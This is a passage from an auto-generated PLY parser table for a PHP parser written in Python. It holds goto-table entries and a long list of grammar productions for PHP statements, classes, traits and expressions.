,'case_separator':([827,873,],[874,913,]),'lexical_var_list':([837,],[885,]),'trait_modifiers_list':([852,892,],[898,925,]),'for_statement':([868,],[909,]),'trait_modifier':([898,925,],[931,931,]),'trait_member':([898,925,],[932,932,]),'method_body':([958,965,],[966,974,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> start","S'",1,None,None,None),
('start -> top_statement_list','start',1,'p_start','phpparse.py',90),
('top_statement_list -> top_statement_list top_statement','top_statement_list',2,'p_top_statement_list','phpparse.py',94),
('top_statement_list -> empty','top_statement_list',1,'p_top_statement_list','phpparse.py',95),
('top_statement -> statement','top_statement',1,'p_top_statement','phpparse.py',102),
('top_statement -> function_declaration_statement','top_statement',1,'p_top_statement','phpparse.py',103),
('top_statement -> class_declaration_statement','top_statement',1,'p_top_statement','phpparse.py',104),
('top_statement -> HALT_COMPILER LPAREN RPAREN SEMI','top_statement',4,'p_top_statement','phpparse.py',105),
('top_statement -> NAMESPACE namespace_name SEMI','top_statement',3,'p_top_statement_namespace','phpparse.py',113),
('top_statement -> NAMESPACE LBRACE top_statement_list RBRACE','top_statement',4,'p_top_statement_namespace','phpparse.py',114),
('top_statement -> NAMESPACE namespace_name LBRACE top_statement_list RBRACE','top_statement',5,'p_top_statement_namespace','phpparse.py',115),
('top_statement -> CONST constant_declarations SEMI','top_statement',3,'p_top_statement_constant','phpparse.py',124),
('top_statement -> USE use_declarations SEMI','top_statement',3,'p_top_statement_use','phpparse.py',128),
('use_declarations -> use_declarations COMMA use_declaration','use_declarations',3,'p_use_declarations','phpparse.py',132),
('use_declarations -> use_declaration','use_declarations',1,'p_use_declarations','phpparse.py',133),
('use_declaration -> namespace_name','use_declaration',1,'p_use_declaration','phpparse.py',140),
('use_declaration -> NS_SEPARATOR namespace_name','use_declaration',2,'p_use_declaration','phpparse.py',141),
('use_declaration -> namespace_name AS STRING','use_declaration',3,'p_use_declaration','phpparse.py',142),
('use_declaration -> NS_SEPARATOR namespace_name AS STRING','use_declaration',4,'p_use_declaration','phpparse.py',143),
('constant_declarations -> constant_declarations COMMA constant_declaration','constant_declarations',3,'p_constant_declarations','phpparse.py',154),
('constant_declarations -> constant_declaration','constant_declarations',1,'p_constant_declarations','phpparse.py',155),
('constant_declaration -> STRING EQUALS static_expr','constant_declaration',3,'p_constant_declaration','phpparse.py',162),
('inner_statement_list -> inner_statement_list inner_statement','inner_statement_list',2,'p_inner_statement_list','phpparse.py',166),
('inner_statement_list -> empty','inner_statement_list',1,'p_inner_statement_list','phpparse.py',167),
('inner_statement -> statement','inner_statement',1,'p_inner_statement','phpparse.py',174),
('inner_statement -> function_declaration_statement','inner_statement',1,'p_inner_statement','phpparse.py',175),
('inner_statement -> class_declaration_statement','inner_statement',1,'p_inner_statement','phpparse.py',176),
('inner_statement -> HALT_COMPILER LPAREN RPAREN SEMI','inner_statement',4,'p_inner_statement','phpparse.py',177),
('inner_statement -> YIELD SEMI','inner_statement',2,'p_inner_statement_yield','phpparse.py',182),
('inner_statement -> YIELD expr SEMI','inner_statement',3,'p_inner_statement_yield','phpparse.py',183),
('statement -> LBRACE inner_statement_list RBRACE','statement',3,'p_statement_block','phpparse.py',190),
('statement -> IF LPAREN expr RPAREN statement elseif_list else_single','statement',7,'p_statement_if','phpparse.py',194),
('statement -> IF LPAREN expr RPAREN COLON inner_statement_list new_elseif_list new_else_single ENDIF SEMI','statement',10,'p_statement_if','phpparse.py',195),
('statement -> WHILE LPAREN expr RPAREN while_statement','statement',5,'p_statement_while','phpparse.py',203),
('statement -> DO statement WHILE LPAREN expr RPAREN SEMI','statement',7,'p_statement_do_while','phpparse.py',207),
('statement -> FOR LPAREN for_expr SEMI for_expr SEMI for_expr RPAREN for_statement','statement',9,'p_statement_for','phpparse.py',211),
('statement -> FOREACH LPAREN expr AS foreach_variable foreach_optional_arg RPAREN foreach_statement','statement',8,'p_statement_foreach','phpparse.py',215),
('statement -> SWITCH LPAREN expr RPAREN switch_case_list','statement',5,'p_statement_switch','phpparse.py',222),
('statement -> BREAK SEMI','statement',2,'p_statement_break','phpparse.py',226),
('statement -> BREAK expr SEMI','statement',3,'p_statement_break','phpparse.py',227),
('statement -> CONTINUE SEMI','statement',2,'p_statement_continue','phpparse.py',234),
('statement -> CONTINUE expr SEMI','statement',3,'p_statement_continue','phpparse.py',235),
('statement -> RETURN SEMI','statement',2,'p_statement_return','phpparse.py',242),
('statement -> RETURN expr SEMI','statement',3,'p_statement_return','phpparse.py',243),
('statement -> GLOBAL global_var_list SEMI','statement',3,'p_statement_global','phpparse.py',250),
('statement -> STATIC static_var_list SEMI','statement',3,'p_statement_static','phpparse.py',254),
('statement -> ECHO echo_expr_list SEMI','statement',3,'p_statement_echo','phpparse.py',258),
('statement -> INLINE_HTML','statement',1,'p_statement_inline_html','phpparse.py',262),
('statement -> expr SEMI','statement',2,'p_statement_expr','phpparse.py',266),
('statement -> UNSET LPAREN unset_variables RPAREN SEMI','statement',5,'p_statement_unset','phpparse.py',270),
('statement -> SEMI','statement',1,'p_statement_empty','phpparse.py',274),
('statement -> TRY LBRACE inner_statement_list RBRACE additional_catches maybe_finally','statement',6,'p_statement_try','phpparse.py',278),
('additional_catches -> additional_catches CATCH LPAREN fully_qualified_class_name VARIABLE RPAREN LBRACE inner_statement_list RBRACE','additional_catches',9,'p_additional_catches','phpparse.py',282),
('additional_catches -> empty','additional_catches',1,'p_additional_catches','phpparse.py',283),
('maybe_finally -> FINALLY LBRACE inner_statement_list RBRACE','maybe_finally',4,'p_maybe_finally','phpparse.py',291),
('maybe_finally -> empty','maybe_finally',1,'p_maybe_finally','phpparse.py',292),
('statement -> THROW expr SEMI','statement',3,'p_statement_throw','phpparse.py',299),
('statement -> DECLARE LPAREN declare_list RPAREN declare_statement','statement',5,'p_statement_declare','phpparse.py',303),
('declare_list -> STRING EQUALS static_scalar','declare_list',3,'p_declare_list','phpparse.py',307),
('declare_list -> declare_list COMMA STRING EQUALS static_scalar','declare_list',5,'p_declare_list','phpparse.py',308),
('declare_statement -> statement','declare_statement',1,'p_declare_statement','phpparse.py',315),
('declare_statement -> COLON inner_statement_list ENDDECLARE SEMI','declare_statement',4,'p_declare_statement','phpparse.py',316),
('elseif_list -> empty','elseif_list',1,'p_elseif_list','phpparse.py',323),
('elseif_list -> elseif_list ELSEIF LPAREN expr RPAREN statement','elseif_list',6,'p_elseif_list','phpparse.py',324),
('else_single -> empty','else_single',1,'p_else_single','phpparse.py',331),
('else_single -> ELSE statement','else_single',2,'p_else_single','phpparse.py',332),
('new_elseif_list -> empty','new_elseif_list',1,'p_new_elseif_list','phpparse.py',337),
('new_elseif_list -> new_elseif_list ELSEIF LPAREN expr RPAREN COLON inner_statement_list','new_elseif_list',7,'p_new_elseif_list','phpparse.py',338),
('new_else_single -> empty','new_else_single',1,'p_new_else_single','phpparse.py',346),
('new_else_single -> ELSE COLON inner_statement_list','new_else_single',3,'p_new_else_single','phpparse.py',347),
('while_statement -> statement','while_statement',1,'p_while_statement','phpparse.py',353),
('while_statement -> COLON inner_statement_list ENDWHILE SEMI','while_statement',4,'p_while_statement','phpparse.py',354),
('for_expr -> empty','for_expr',1,'p_for_expr','phpparse.py',361),
('for_expr -> non_empty_for_expr','for_expr',1,'p_for_expr','phpparse.py',362),
('non_empty_for_expr -> non_empty_for_expr COMMA expr','non_empty_for_expr',3,'p_non_empty_for_expr','phpparse.py',366),
('non_empty_for_expr -> expr','non_empty_for_expr',1,'p_non_empty_for_expr','phpparse.py',367),
('for_statement -> statement','for_statement',1,'p_for_statement','phpparse.py',374),
('for_statement -> COLON inner_statement_list ENDFOR SEMI','for_statement',4,'p_for_statement','phpparse.py',375),
('foreach_variable -> LIST LPAREN assignment_list RPAREN','foreach_variable',4,'p_foreach_variable','phpparse.py',382),
('foreach_variable -> variable','foreach_variable',1,'p_foreach_variable','phpparse.py',383),
('foreach_variable -> AND variable','foreach_variable',2,'p_foreach_variable','phpparse.py',384),
('foreach_optional_arg -> empty','foreach_optional_arg',1,'p_foreach_optional_arg','phpparse.py',395),
('foreach_optional_arg -> DOUBLE_ARROW foreach_variable','foreach_optional_arg',2,'p_foreach_optional_arg','phpparse.py',396),
('foreach_statement -> statement','foreach_statement',1,'p_foreach_statement','phpparse.py',401),
('foreach_statement -> COLON inner_statement_list ENDFOREACH SEMI','foreach_statement',4,'p_foreach_statement','phpparse.py',402),
('switch_case_list -> LBRACE case_list RBRACE','switch_case_list',3,'p_switch_case_list','phpparse.py',409),
('switch_case_list -> LBRACE SEMI case_list RBRACE','switch_case_list',4,'p_switch_case_list','phpparse.py',410),
('switch_case_list -> COLON case_list ENDSWITCH SEMI','switch_case_list',4,'p_switch_case_list_colon','phpparse.py',417),
('switch_case_list -> COLON SEMI case_list ENDSWITCH SEMI','switch_case_list',5,'p_switch_case_list_colon','phpparse.py',418),
('case_list -> empty','case_list',1,'p_case_list','phpparse.py',425),
('case_list -> case_list CASE expr case_separator inner_statement_list','case_list',5,'p_case_list','phpparse.py',426),
('case_list -> case_list DEFAULT case_separator inner_statement_list','case_list',4,'p_case_list','phpparse.py',427),
('case_separator -> COLON','case_separator',1,'p_case_separator','phpparse.py',436),
('case_separator -> SEMI','case_separator',1,'p_case_separator','phpparse.py',437),
('global_var_list -> global_var_list COMMA global_var','global_var_list',3,'p_global_var_list','phpparse.py',441),
('global_var_list -> global_var','global_var_list',1,'p_global_var_list','phpparse.py',442),
('global_var -> VARIABLE','global_var',1,'p_global_var','phpparse.py',449),
('global_var -> DOLLAR variable','global_var',2,'p_global_var','phpparse.py',450),
('global_var -> DOLLAR LBRACE expr RBRACE','global_var',4,'p_global_var','phpparse.py',451),
('static_var_list -> static_var_list COMMA static_var','static_var_list',3,'p_static_var_list','phpparse.py',460),
('static_var_list -> static_var','static_var_list',1,'p_static_var_list','phpparse.py',461),
('static_var -> VARIABLE EQUALS static_scalar','static_var',3,'p_static_var','phpparse.py',468),
('static_var -> VARIABLE','static_var',1,'p_static_var','phpparse.py',469),
('echo_expr_list -> echo_expr_list COMMA expr','echo_expr_list',3,'p_echo_expr_list','phpparse.py',476),
('echo_expr_list -> expr','echo_expr_list',1,'p_echo_expr_list','phpparse.py',477),
('unset_variables -> unset_variables COMMA unset_variable','unset_variables',3,'p_unset_variables','phpparse.py',484),
('unset_variables -> unset_variable','unset_variables',1,'p_unset_variables','phpparse.py',485),
('unset_variable -> variable','unset_variable',1,'p_unset_variable','phpparse.py',492),
('function_declaration_statement -> FUNCTION is_reference STRING LPAREN parameter_list RPAREN LBRACE inner_statement_list RBRACE','function_declaration_statement',9,'p_function_declaration_statement','phpparse.py',496),
('class_declaration_statement -> class_entry_type STRING extends_from implements_list LBRACE class_statement_list RBRACE','class_declaration_statement',7,'p_class_declaration_statement','phpparse.py',500),
('class_declaration_statement -> INTERFACE STRING interface_extends_list LBRACE class_statement_list RBRACE','class_declaration_statement',6,'p_class_declaration_statement','phpparse.py',501),
('class_declaration_statement -> TRAIT STRING LBRACE trait_statement_list RBRACE','class_declaration_statement',5,'p_class_declaration_statement','phpparse.py',502),
('class_entry_type -> CLASS','class_entry_type',1,'p_class_entry_type','phpparse.py',525),
('class_entry_type -> ABSTRACT CLASS','class_entry_type',2,'p_class_entry_type','phpparse.py',526),
('class_entry_type -> FINAL CLASS','class_entry_type',2,'p_class_entry_type','phpparse.py',527),
('extends_from -> empty','extends_from',1,'p_extends_from','phpparse.py',532),
('extends_from -> EXTENDS fully_qualified_class_name','extends_from',2,'p_extends_from','phpparse.py',533),
('fully_qualified_class_name -> namespace_name','fully_qualified_class_name',1,'p_fully_qualified_class_name','phpparse.py',538),
('fully_qualified_class_name -> NS_SEPARATOR namespace_name','fully_qualified_class_name',2,'p_fully_qualified_class_name','phpparse.py',539),
('fully_qualified_class_name -> NAMESPACE NS_SEPARATOR namespace_name','fully_qualified_class_name',3,'p_fully_qualified_class_name','phpparse.py',540),
('implements_list -> IMPLEMENTS interface_list','implements_list',2,'p_implements_list','phpparse.py',549),
('implements_list -> empty','implements_list',1,'p_implements_list','phpparse.py',550),
('trait_modifiers_list -> trait_modifiers_list trait_modifier','trait_modifiers_list',2,'p_trait_modifiers_list','phpparse.py',557),
('trait_modifiers_list -> empty','trait_modifiers_list',1,'p_trait_modifiers_list','phpparse.py',558),
('trait_member -> fully_qualified_class_name DOUBLE_COLON STRING','trait_member',3,'p_trait_member','phpparse.py',565),
('trait_member -> STRING','trait_member',1,'p_trait_member','phpparse.py',566),
('trait_modifier -> trait_member AS STRING SEMI','trait_modifier',4,'p_trait_modifier','phpparse.py',573),
('trait_modifier -> trait_member AS visibility_modifier STRING SEMI','trait_modifier',5,'p_trait_modifier_with_visibility','phpparse.py',577),
('trait_modifier -> trait_member AS visibility_modifier SEMI','trait_modifier',4,'p_trait_modifier_with_visibility','phpparse.py',578),
('trait_statement_list -> trait_statement_list trait_statement','trait_statement_list',2,'p_trait_statement_list','phpparse.py',585),
('trait_statement_list -> empty','trait_statement_list',1,'p_trait_statement_list','phpparse.py',586),
('trait_statement -> method_modifiers FUNCTION is_reference STRING LPAREN parameter_list RPAREN method_body','trait_statement',8,'p_trait_statement','phpparse.py',594),
('trait_statement -> variable_modifiers class_variable_declaration SEMI','trait_statement',3,'p_trait_statement','phpparse.py',595),
('trait_statement -> USE fully_qualified_class_name LBRACE trait_modifiers_list RBRACE','trait_statement',5,'p_trait_statement','phpparse.py',596),
('trait_statement -> USE fully_qualified_class_name SEMI','trait_statement',3,'p_trait_statement','phpparse.py',597),
('class_statement_list -> class_statement_list class_statement','class_statement_list',2,'p_class_statement_list','phpparse.py',609),
('class_statement_list -> empty','class_statement_list',1,'p_class_statement_list','phpparse.py',610),
('class_statement -> method_modifiers FUNCTION is_reference STRING LPAREN parameter_list RPAREN method_body','class_statement',8,'p_class_statement','phpparse.py',618),
('class_statement -> variable_modifiers class_variable_declaration SEMI','class_statement',3,'p_class_statement','phpparse.py',619),
('class_statement -> class_constant_declaration SEMI','class_statement',2,'p_class_statement','phpparse.py',620),
('class_statement -> USE fully_qualified_class_name LBRACE trait_modifiers_list RBRACE','class_statement',5,'p_class_statement','phpparse.py',621),
('class_statement -> USE fully_qualified_class_name SEMI','class_statement',3,'p_class_statement','phpparse.py',622),
('class_variable_declaration -> class_variable_declaration COMMA VARIABLE EQUALS static_scalar','class_variable_declaration',5,'p_class_variable_declaration_initial','phpparse.py',636),
('class_variable_declaration -> VARIABLE EQUALS static_scalar','class_variable_declaration',3,'p_class_variable_declaration_initial','phpparse.py',637),
('class_variable_declaration -> class_variable_declaration COMMA VARIABLE','class_variable_declaration',3,'p_class_variable_declaration_no_initial','phpparse.py',644),
('class_variable_declaration -> VARIABLE','class_variable_declaration',1,'p_class_variable_declaration_no_initial','phpparse.py',645),
('class_constant_declaration -> class_constant_declaration COMMA STRING EQUALS static_expr','class_constant_declaration',5,'p_class_constant_declaration','phpparse.py',652),
('class_constant_declaration -> CONST STRING EQUALS static_expr','class_constant_declaration',4,'p_class_constant_declaration','phpparse.py',653),
('interface_list -> interface_list COMMA fully_qualified_class_name','interface_list',3,'p_interface_list','phpparse.py',660),
('interface_list -> fully_qualified_class_name','interface_list',1,'p_interface_list','phpparse.py',661),
('interface_extends_list -> EXTENDS interface_list','interface_extends_list',2,'p_interface_extends_list','phpparse.py',668),
('interface_extends_list -> empty','interface_extends_list',1,'p_interface_extends_list','phpparse.py',669),
('variable_modifiers -> non_empty_member_modifiers','variable_modifiers',1,'p_variable_modifiers_non_empty','phpparse.py',674),
('variable_modifiers -> VAR','variable_modifiers',1,'p_variable_modifiers_var','phpparse.py',678),
('method_modifiers -> non_empty_member_modifiers','method_modifiers',1,'p_method_modifiers_non_empty','phpparse.py',682),
('method_modifiers -> empty','method_modifiers',1,'p_method_modifiers_empty','phpparse.py',686),
('method_body -> LBRACE inner_statement_list RBRACE','method_body',3,'p_method_body','phpparse.py',690),
('method_body -> SEMI','method_body',1,'p_method_body','phpparse.py',691),
('non_empty_member_modifiers -> non_empty_member_modifiers member_modifier','non_empty_member_modifiers',2,'p_non_empty_member_modifiers','phpparse.py',698),
('non_empty_member_modifiers -> member_modifier','non_empty_member_modifiers',1,'p_non_empty_member_modifiers','phpparse.py',699),
('visibility_modifier -> PUBLIC','visibility_modifier',1,'p_visibility_modifier','phpparse.py',706),
('visibility_modifier -> PROTECTED','visibility_modifier',1,'p_visibility_modifier','phpparse.py',707),
('visibility_modifier -> PRIVATE','visibility_modifier',1,'p_visibility_modifier','phpparse.py',708),
('member_modifier -> visibility_modifier','member_modifier',1,'p_member_modifier','phpparse.py',712),
('member_modifier -> STATIC','member_modifier',1,'p_member_modifier','phpparse.py',713),
('member_modifier -> ABSTRACT','member_modifier',1,'p_member_modifier','phpparse.py',714),
('member_modifier -> FINAL','member_modifier',1,'p_member_modifier','phpparse.py',715),
('is_reference -> AND','is_reference',1,'p_is_reference','phpparse.py',719),
('is_reference -> empty','is_reference',1,'p_is_reference','phpparse.py',720),
('parameter_list -> parameter_list COMMA parameter','parameter_list',3,'p_parameter_list','phpparse.py',724),
('parameter_list -> parameter','parameter_list',1,'p_parameter_list','phpparse.py',725),
('parameter_list -> empty','parameter_list',1,'p_parameter_list_empty','phpparse.py',732),
('parameter -> VARIABLE','parameter',1,'p_parameter','phpparse.py',736),
('parameter -> class_name VARIABLE','parameter',2,'p_parameter','phpparse.py',737),
('parameter -> AND VARIABLE','parameter',2,'p_parameter','phpparse.py',738),
('parameter -> class_name AND VARIABLE','parameter',3,'p_parameter','phpparse.py',739),
('parameter -> VARIABLE EQUALS static_scalar','parameter',3,'p_parameter','phpparse.py',740),
('parameter -> class_name VARIABLE EQUALS static_scalar','parameter',4,'p_parameter','phpparse.py',741),
('parameter -> AND VARIABLE EQUALS static_scalar','parameter',4,'p_parameter','phpparse.py',742),
('parameter -> class_name AND VARIABLE EQUALS static_scalar','parameter',5,'p_parameter','phpparse.py',743),
('expr -> variable','expr',1,'p_expr_variable','phpparse.py',762),
('expr -> variable EQUALS expr','expr',3,'p_expr_assign','phpparse.py',766),
('expr -> variable EQUALS AND expr','expr',4,'p_expr_assign','phpparse.py',767),
('expr -> NEW class_name_reference ctor_arguments','expr',3,'p_expr_new','phpparse.py',774),
('expr -> expr OBJECT_OPERATOR object_property method_or_not','expr',4,'p_expr_objectop','phpparse.py',778),
('class_name_reference -> class_name','class_name_reference',1,'p_class_name_reference','phpparse.py',788),
('class_name_reference -> dynamic_class_name_reference','class_name_reference',1,'p_class_name_reference','phpparse.py',789),
('class_name -> namespace_name','class_name',1,'p_class_name','phpparse.py',793),
('class_name -> NS_SEPARATOR namespace_name','class_name',2,'p_class_name','phpparse.py',794),
('class_name -> NAMESPACE NS_SEPARATOR namespace_name','class_name',3,'p_class_name','phpparse.py',795),
('class_name -> STATIC','class_name',1,'p_class_name_static','phpparse.py',804),
('dynamic_class_name_reference -> base_variable OBJECT_OPERATOR object_property dynamic_class_name_variable_properties','dynamic_class_name_reference',4,'p_dynamic_class_name_reference','phpparse.py',808),
('dynamic_class_name_reference -> base_variable','dynamic_class_name_reference',1,'p_dynamic_class_name_reference','phpparse.py',809),
('dynamic_class_name_variable_properties -> dynamic_class_name_variable_properties dynamic_class_name_variable_property','dynamic_class_name_variable_properties',2,'p_dynamic_class_name_variable_properties','phpparse.py',823),
('dynamic_class_name_variable_properties -> empty','dynamic_class_name_variable_properties',1,'p_dynamic_class_name_variable_properties','phpparse.py',824),
('dynamic_class_name_variable_property -> OBJECT_OPERATOR object_property','dynamic_class_name_variable_property',2,'p_dynamic_class_name_variable_property','phpparse.py',831),
('ctor_arguments -> LPAREN function_call_parameter_list RPAREN','ctor_arguments',3,'p_ctor_arguments','phpparse.py',835),
('ctor_arguments -> empty','ctor_arguments',1,'p_ctor_arguments','phpparse.py',836),
('expr -> CLONE expr','expr',2,'p_expr_clone','phpparse.py',843),
('expr -> LIST LPAREN assignment_list RPAREN EQUALS expr','expr',6,'p_expr_list_assign','phpparse.py',847),
('assignment_list -> assignment_list COMMA assignment_list_element','assignment_list',3,'p_assignment_list','phpparse.py',851),
('assignment_list -> assignment_list_element','assignment_list',1,'p_assignment_list','phpparse.py',852),
('assignment_list_element -> variable','assignment_list_element',1,'p_assignment_list_element','phpparse.py',859),
('assignment_list_element -> empty','assignment_list_element',1,'p_assignment_list_element','phpparse.py',860),
('assignment_list_element -> LIST LPAREN assignment_list RPAREN','assignment_list_element',4,'p_assignment_list_element','phpparse.py',861),
('variable -> base_variable_with_function_calls OBJECT_OPERATOR object_property method_or_not variable_properties','variable',5,'p_variable','phpparse.py',868),
('variable -> base_variable_with_function_calls','variable',1,'p_variable','phpparse.py',869),
('base_variable_with_function_calls -> base_variable','base_variable_with_function_calls',1,'p_base_variable_with_function_calls','phpparse.py',890),
('base_variable_with_function_calls -> function_call','base_variable_with_function_calls',1,'p_base_variable_with_function_calls','phpparse.py',891),
('function_call -> namespace_name LPAREN function_call_parameter_list RPAREN','function_call',4,'p_function_call','phpparse.py',895),
('function_call -> NS_SEPARATOR namespace_name LPAREN function_call_parameter_list RPAREN','function_call',5,'p_function_call','phpparse.py',896),
('function_call -> NAMESPACE NS_SEPARATOR namespace_name LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call','phpparse.py',897),
('function_call -> class_name DOUBLE_COLON STRING LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',906),
('function_call -> class_name DOUBLE_COLON variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',907),
('function_call -> variable_class_name DOUBLE_COLON STRING LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',908),
('function_call -> variable_class_name DOUBLE_COLON variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',909),
('function_call -> class_name DOUBLE_COLON LBRACE expr RBRACE LPAREN function_call_parameter_list RPAREN','function_call',8,'p_function_call_static_dynamic_name','phpparse.py',913),
('function_call -> variable_class_name DOUBLE_COLON LBRACE expr RBRACE LPAREN function_call_parameter_list RPAREN','function_call',8,'p_function_call_static_dynamic_name','phpparse.py',914),
('function_call -> variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',4,'p_function_call_variable','phpparse.py',918),
('function_call -> BACKTICK encaps_list BACKTICK','function_call',3,'p_function_call_backtick_shell_exec','phpparse.py',922),
('method_or_not -> LPAREN function_call_parameter_list RPAREN','method_or_not',3,'p_method_or_not','phpparse.py',926),
('method_or_not -> empty','method_or_not',1,'p_method_or_not','phpparse.py',927),
('variable_properties -> variable_properties variable_property','variable_properties',2,'p_variable_properties','phpparse.py',932),
('variable_properties -> empty','variable_properties',1,'p_variable_properties','phpparse.py',933),
('variable_property -> OBJECT_OPERATOR object_property method_or_not','variable_property',3,'p_variable_property','phpparse.py',940),
('base_variable -> simple_indirect_reference','base_variable',1,'p_base_variable','phpparse.py',944),
('base_variable -> static_member','base_variable',1,'p_base_variable','phpparse.py',945),
('simple_indirect_reference -> DOLLAR simple_indirect_reference','simple_indirect_reference',2,'p_simple_indirect_reference','phpparse.py',949),
('simple_indirect_reference -> reference_variable','simple_indirect_reference',1,'p_simple_indirect_reference','phpparse.py',950),
('static_member -> class_name DOUBLE_COLON variable_without_objects','static_member',3,'p_static_member','phpparse.py',957),
('static_member -> variable_class_name DOUBLE_COLON variable_without_objects','static_member',3,'p_static_member','phpparse.py',958),
('static_member -> class_name DOUBLE_COLON LBRACE expr RBRACE','static_member',5,'p_static_member','phpparse.py',959),
('static_member -> variable_class_name DOUBLE_COLON LBRACE expr RBRACE','static_member',5,'p_static_member','phpparse.py',960),
('variable_class_name -> reference_variable','variable_class_name',1,'p_variable_class_name','phpparse.py',967),
('variable -> variable LBRACKET dim_offset RBRACKET','variable',4,'p_variable_array_offset','phpparse.py',971),
('reference_variable -> reference_variable LBRACKET dim_offset RBRACKET','reference_variable',4,'p_reference_variable_array_offset','phpparse.py',975),
('reference_variable -> reference_variable LBRACE expr RBRACE','reference_variable',4,'p_reference_variable_string_offset','phpparse.py',979),
('reference_variable -> compound_variable','reference_variable',1,'p_reference_variable_compound_variable','phpparse.py',983),
('expr -> expr LBRACE dim_offset RBRACE','expr',4,'p_expr_string_offset','phpparse.py',987),
('compound_variable -> VARIABLE','compound_variable',1,'p_compound_variable','phpparse.py',991),
('compound_variable -> DOLLAR LBRACE expr RBRACE','compound_variable',4,'p_compound_variable','phpparse.py',992),
('dim_offset -> expr','dim_offset',1,'p_dim_offset','phpparse.py',999),
('dim_offset -> empty','dim_offset',1,'p_dim_offset','phpparse.py',1000),
('object_property -> variable_name object_dim_list','object_property',2,'p_object_property','phpparse.py',1004),
('object_property -> variable_without_objects','object_property',1,'p_object_property','phpparse.py',1005),
('object_dim_list -> empty','object_dim_list',1,'p_object_dim_list_empty','phpparse.py',1012),
('object_dim_list -> object_dim_list LBRACKET dim_offset RBRACKET','object_dim_list',4,'p_object_dim_list_array_offset','phpparse.py',1016),
('object_dim_list -> object_dim_list LBRACE expr RBRACE','object_dim_list',4,'p_object_dim_list_string_offset','phpparse.py',1020),
('variable_name -> STRING','variable_name',1,'p_variable_name','phpparse.py',1024),
('variable_name -> LBRACE expr RBRACE','variable_name',3,'p_variable_name','phpparse.py',1025),
('variable_without_objects -> simple_indirect_reference','variable_without_objects',1,'p_variable_without_objects','phpparse.py',1032),
('expr -> scalar','expr',1,'p_expr_scalar','phpparse.py',1036),
('expr -> ARRAY LPAREN array_pair_list RPAREN','expr',4,'p_expr_array','phpparse.py',1040),
('expr -> LBRACKET array_pair_list RBRACKET','expr',3,'p_expr_array','phpparse.py',1041),
('array_pair_list -> empty','array_pair_list',1,'p_array_pair_list','phpparse.py',1050),
('array_pair_list -> non_empty_array_pair_list possible_comma','array_pair_list',2,'p_array_pair_list','phpparse.py',1051),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA AND variable','non_empty_array_pair_list',4,'p_non_empty_array_pair_list_item','phpparse.py',1058),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr','non_empty_array_pair_list',3,'p_non_empty_array_pair_list_item','phpparse.py',1059),
('non_empty_array_pair_list -> AND variable','non_empty_array_pair_list',2,'p_non_empty_array_pair_list_item','phpparse.py',1060),
('non_empty_array_pair_list -> expr','non_empty_array_pair_list',1,'p_non_empty_array_pair_list_item','phpparse.py',1061),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr DOUBLE_ARROW AND variable','non_empty_array_pair_list',6,'p_non_empty_array_pair_list_pair','phpparse.py',1072),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr DOUBLE_ARROW expr','non_empty_array_pair_list',5,'p_non_empty_array_pair_list_pair','phpparse.py',1073),
('non_empty_array_pair_list -> expr DOUBLE_ARROW AND variable','non_empty_array_pair_list',4,'p_non_empty_array_pair_list_pair','phpparse.py',1074),
('non_empty_array_pair_list -> expr DOUBLE_ARROW expr','non_empty_array_pair_list',3,'p_non_empty_array_pair_list_pair','phpparse.py',1075),
('possible_comma -> empty','possible_comma',1,'p_possible_comma','phpparse.py',1086),
('possible_comma -> COMMA','possible_comma',1,'p_possible_comma','phpparse.py',1087),
('function_call_parameter_list -> function_call_parameter_list COMMA function_call_parameter','function_call_parameter_list',3,'p_function_call_parameter_list','phpparse.py',1091),
('function_call_parameter_list -> function_call_parameter','function_call_parameter_list',1,'p_function_call_parameter_list','phpparse.py',1092),
('function_call_parameter_list -> empty','function_call_parameter_list',1,'p_function_call_parameter_list_empty','phpparse.py',1099),
('function_call_parameter -> expr','function_call_parameter',1,'p_function_call_parameter','phpparse.py',1103),
('function_call_parameter -> AND variable','function_call_parameter',2,'p_function_call_parameter','phpparse.py',1104),
('expr -> FUNCTION is_reference LPAREN parameter_list RPAREN lexical_vars LBRACE inner_statement_list RBRACE','expr',9,'p_expr_function','phpparse.py',1111),
('lexical_vars -> USE LPAREN lexical_var_list RPAREN','lexical_vars',4,'p_lexical_vars','phpparse.py',1115),
('lexical_vars -> empty','lexical_vars',1,'p_lexical_vars','phpparse.py',1116),
('lexical_var_list -> lexical_var_list COMMA AND VARIABLE','lexical_var_list',4,'p_lexical_var_list','phpparse.py',1123),
('lexical_var_list -> lexical_var_list COMMA VARIABLE','lexical_var_list',3,'p_lexical_var_list','phpparse.py',1124),
('lexical_var_list -> AND VARIABLE','lexical_var_list',2,'p_lexical_var_list','phpparse.py',1125),
('lexical_var_list -> VARIABLE','lexical_var_list',1,'p_lexical_var_list','phpparse.py',1126),
('expr -> variable PLUS_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1137),
('expr -> variable MINUS_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1138),
('expr -> variable MUL_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1139),
('expr -> variable DIV_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1140),
('expr -> variable CONCAT_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1141),
('expr -> variable MOD_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1142),
('expr -> variable AND_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1143),
('expr -> variable OR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1144),
('expr -> variable XOR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1145),
('expr -> variable SL_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1146),
('expr -> variable SR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1147),
